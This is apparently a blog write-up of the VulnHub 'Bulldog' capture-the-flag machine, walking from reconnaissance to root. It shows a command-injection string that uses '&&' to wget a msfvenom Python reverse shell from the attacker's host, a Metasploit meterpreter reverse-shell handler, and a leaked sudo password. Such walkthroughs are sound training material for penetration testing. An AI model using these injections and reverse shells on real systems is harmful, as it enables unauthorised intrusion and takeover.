Bulldog – VulnHub

In this CTF writeup i am going to give you a walkthrough of “Bulldog” which is a vulnerable machine designed for security enthusiasts to increase their vulnerability assessment and penetration skills.
You can download this machine from Vulnhub link provided.

1. Start with Nmap “nmap -sV 192.168.1.158”


2. As we can see port 23 is open,,,, tried telnet and netcat but no luck
root@kali:~# telnet 192.168.1.158 23
Trying 192.168.1.158…
Connected to 192.168.1.158.
Escape character is ‘^]’.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2

Protocol mismatch.
Connection closed by foreign host.


3. Try dirb on the host and got few links

root@kali:~# dirb http://192.168.1.158
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Wed Nov 22 04:29:57 2017
URL_BASE: http://192.168.1.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
—————–
GENERATED WORDS: 4612
—- Scanning URL: http://192.168.1.158/ —-
==> DIRECTORY: http://192.168.1.158/admin/
==> DIRECTORY: http://192.168.1.158/dev/
+ http://192.168.1.158/robots.txt (CODE:200|SIZE:1071)
—- Entering directory: http://192.168.1.158/admin/ —-
==> DIRECTORY: http://192.168.1.158/admin/auth/
==> DIRECTORY: http://192.168.1.158/admin/login/
==> DIRECTORY: http://192.168.1.158/admin/logout/

—- Entering directory: http://192.168.1.158/dev/ —-
==> DIRECTORY: http://192.168.1.158/dev/shell/

—- Entering directory: http://192.168.1.158/admin/auth/ —-
==> DIRECTORY: http://192.168.1.158/admin/auth/group/
==> DIRECTORY: http://192.168.1.158/admin/auth/user/

—- Entering directory: http://192.168.1.158/admin/login/ —-

—- Entering directory: http://192.168.1.158/admin/logout/ —-

—- Entering directory: http://192.168.1.158/dev/shell/ —-

—- Entering directory: http://192.168.1.158/admin/auth/group/ —-
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: ‘-f’)

—- Entering directory: http://192.168.1.158/admin/auth/user/ —-
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: ‘-f’)

—————–
END_TIME: Wed Nov 22 04:32:16 2017
DOWNLOADED: 32284 – FOUND: 1


4. Open the directories we got in dirb

http://192.168.1.158/dev/
http://192.168.1.158/dev/shell/
http://192.168.1.158/admin/

On viewing page source of http://192.168.1.158/dev/ we got


5. We Google these hashes and got the password for nick/bulldog


6. Now login to the admin page and open http://192.168.1.158/dev/shell/ but on web shell we have options to run limited commands

but you can do command injection using && operator.


7. We will use wget to get the shell transfer from kali to local machine

create a rev shell in python using msfvenom

transfer it using wget ls && wget http://192.168.1.6:3000/shell.py

Make sure you give shell.py execute permission

Now setting up a listener

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp_uuid
payload => python/meterpreter/reverse_tcp_uuid
msf exploit(handler) > set RHOST 192.168.1.158
RHOST => 192.168.1.158
msf exploit(handler) > set LPORT 7000
LPORT => 7000
msf exploit(handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.1.6:7000
[*] Starting the payload handler…
[*] Sending stage (40044 bytes) to 192.168.1.158
[*] Meterpreter session 1 opened (192.168.1.6:7000 -> 192.168.1.158:43296) at 2017-11-30 03:01:47 -0500


8. Now as we have meterpreter session
we will transfer linux privchecker

Go to

meterpreter > ls
Listing: /home/bulldogadmin/.hiddenadmindirectory

take the interactive shell by typing shell on meterpreter


9.

$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/.hiddenAVDirectory$ sudo su –
sudo su –
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:~# id
id
uid=0(root) gid=0(root) groups=0(root)

One thought on “Bulldog”

Leave a Reply

Your email address will not be published. Required fields are marked *

five + 3 =